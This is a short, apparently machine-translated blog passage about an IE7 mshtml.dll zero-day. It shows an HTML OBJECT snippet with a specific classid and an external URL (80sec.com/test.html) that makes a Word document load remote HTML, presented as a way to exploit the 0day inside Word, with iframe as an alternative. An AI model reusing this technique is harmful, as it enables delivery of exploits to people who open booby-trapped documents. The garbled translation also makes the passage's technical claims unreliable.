Ie7 this problem lies in mshtml. dll, and if you are impressed, the word was previously a javascript execution problem. At that time, the idea was to execute javascript, however, it may be a bit difficult to use JavaScript to call an html in a word concealed way (it seems that it cannot be iframe or something). In fact, you can directly specify the url as the url of an html. The Code is as follows:
<Html>
<OBJECT classid = clsid: ae24fdae-03c6-11d1-8b76-0080c744f389> <param name = url
Value = http://www.80sec.com/test.html> </OBJECT>
In this way, you can directly reference external pages and use html to parse them. In this way, you can indirectly use this 0day in word. Speaking of this code, it is also very strange. Why can this code be used locally and in word, but it cannot be used in ie? Here, you can also use iframe as an alternative :)